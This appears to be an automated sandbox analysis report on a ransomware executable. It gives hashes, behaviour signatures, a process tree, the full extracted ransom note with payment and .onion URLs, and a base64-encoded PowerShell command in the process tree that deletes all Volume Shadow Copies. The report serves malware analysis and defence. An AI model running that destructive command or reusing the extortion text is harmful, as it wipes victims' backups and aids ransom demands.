Overview

overview

10

Static

static

10

63ae6ca685...18.exe

windows7-x64

10

63ae6ca685...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-05-2024 14:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    63ae6ca6853552716571555546833d99_JaffaCakes118.exe

  • Size

    166KB

  • MD5

    63ae6ca6853552716571555546833d99

  • SHA1

    09e37e98a74ec8edb36b22a4eb51dbed4390544a

  • SHA256

    9d3a482d9441876096e0cee429fedf7b9f7e1c6a50b3e4b2009884019627d879

  • SHA512

    087baf5fbf764f480f384cbdee878d3dfb8b3880f378b4597d5e292f392341e5da196ee2232a441c6268b7760afffdde293f35f536ee55cff4992b4b45238f86

  • SSDEEP

    1536:EOYMGzUt2Z+tRvSKGNkR87Kk9VWvDtwVQKeDZz0TDsTR6wss+oJ27b5EIBNUup7E:EJMawtnGqtWoKeZC62aoNUSncZUw+S3

Score
10/10
persistenceransomware

Malware Config

Extracted

Path

C:\Users\readme-o331102-NOW.txt

Ransom Note
Your files are locked due to a vulnerability in your system by "o331102" extension. You will not be able to decrypt the files yourself, in the worst case you can destroy the data irreversibly. The only way to unlock your data is to buy the decryption program. Go to the link written below to more details. If you cannot do this yourself, find a data recovery company in internet. They cannot help you unlock your data, because only we have decryption key, but will help you make a payment and provide you guarantees. ATTENTION! DATA RECOVERY AGENCIES WORK AND DURING THE CORONOVIRUS QUARANTINE, THEY WILL HELP YOU REMOTE. Also, I ask you to note, you have no long time, if you do not make payment soon, the price for the decryptor will double. So I recommend you dont waste time and move! Go to the page through the browser: http://decryptor.cc/F16494BF17DAA819 If your site does not open, then download the "TOR Browser" (https://torproject.org/). If you cannot access the download page of the "TOR Browser", then download the VPN! After installing "TOR Browser", open it and follow the link: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F16494BF17DAA819 After going to the site, enter the following code: q14/nTzDsD7DAvOaeiWFUm9RaZm7G5ZqA3rgz/ERvfFCoZoG7R4sECQo+fl2aROA IbrV59Y0FmMrX24jxuCSAbonrUKhprClTHkcaF/QIzhFBtGMCK3Hkjr1VOpmWBJG VQcpG3PCQp6vB9VjrrJ//53uJw79AztnpWRgJGAeR579LzQEnVSTmH+JcYATto9X IaFYJ+lyf54/0TzIuFmknOLNCvgx4zpSwbQ/UgfyudZ2SiOTjMKZeG2h4YjG73nJ zoFuNZMFQbLF6hS/RGMx7yMJ62XQW6U7P2HzDjD01NbFxVVbFoK/SmNngRxFPH7m 3ySn+EoobkqiQtZPqVk/xFyy6tyc41keufNQbeytJtdE/n0BOedThv63sAoA2zAC NvvnBK04aGSKrcwMQ/0QnGHdyFRR58ULUTA+epoPKcRHML6GbK4gELs6YLJTd+UH uE6h6Jlroq0oYtUCR4Cq5seG4CvIXSeAu1kNOR/0CsXK/bF4klNn9aQPV1HlCqcV l0nsYZQKvVWMkoJlm1gijQYuU3LmlEg1B9TZgJROmLqc40jZT4Zw0HGZmDTgMWyO ljEAmL5F2mAWzbzqXlhjuowNM3VQAFzFlgM3oaALB2fqagF5AdS9x+Cf0MWVyF2c e9aA+FoHIbLdQvLfdr8i8zwKWNi55JoC1vpT5FhJQANXnNOzdRhdzY95stuFReHw ZR3Cg63sO28CmRoNC/5Kn73iGIa0gukZJ1wts2OiX/qQQPtnCyD99FaSKqjNlrDs A4qJKeHuWhmpo+K8v7DV7N55Cw7Ve+xznqh67fdta4zlbdfXmS0ttQwlt9xdL2Xw mINBN8dbBXNI5U8bye0cebuzXzRtRFbP+Hb2KRYogrtPe7chyt1J83ybsZ2emcCn wjOk7EEAZ4zKsK9qDVVFHB6dW121Yn7nDwOwF+62wZcCZb6G3x1cCc3agWxcxh88 cd8vqcuzU5i9jX9Igp1nXao56IHAVrGKWAJqqNi+wMPFxAVXPRd7S4HWRXmhgDHB P6P2Vva/hxPGqIKuwWsVjlA33me3cB9FsVwUFWzn35zkzRczfT2z6Gy+6U08erut MMkZDtpnATWHHEa7JixgFtNlTTzRRT+xIarjgbK0uUq22vdtWCdfw4eJm8b8uHF7 h8bkprZLFV6FCfSElvhDNzOOIMGb3PAy7F5fOsAHUYv3IiFVMjcU2jAcC//SntEV KaIhRRPs/eej+P8ihjTKs0ls28cSLRaB2V98hCQTn4crEvGjo0RvWgLaXDaBoBTy /AL5DDwEsgBzqK5VmcczpTJiTJGphZiiLFF+ASxmg+ddibh5wmUEko0sC1rhjkJ/ 9GkTquvAFEyKju2pQNY+mi7el36byrHzgVQHlr6jki8G5NB5NMflCw==
URLs

http://decryptor.cc/F16494BF17DAA819

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F16494BF17DAA819

Signatures

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 21 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\63ae6ca6853552716571555546833d99_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\63ae6ca6853552716571555546833d99_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3164
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4980
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3424
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3536

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uslhciqu.xux.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\readme-o331102-NOW.txt
      Filesize

      5KB

      MD5

      30abce078f0ae57109e5d4753dd80eac

      SHA1

      69fdd94cdaa7713dade415be7261a967137ab1ab

      SHA256

      8ac019fced9fc5f4e698bcda5a2f8fbe1919e901fc6747aee63fdcf0924019e1

      SHA512

      36aec9294d98ac009d78af7c8a49d821e7032fe4e6baede63376fa6f5039a44bb3e6e41e3957743d663b2cbedfa68d025797cf4d048e2bd8cc5375e91162a0d1

      Download Submit

    • memory/4980-0-0x00007FF9D4A03000-0x00007FF9D4A05000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4980-1-0x000002AAEB9B0000-0x000002AAEB9D2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4980-11-0x00007FF9D4A00000-0x00007FF9D54C1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4980-12-0x00007FF9D4A00000-0x00007FF9D54C1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4980-15-0x00007FF9D4A00000-0x00007FF9D54C1000-memory.dmp

      Filesize

      10.8MB

      Download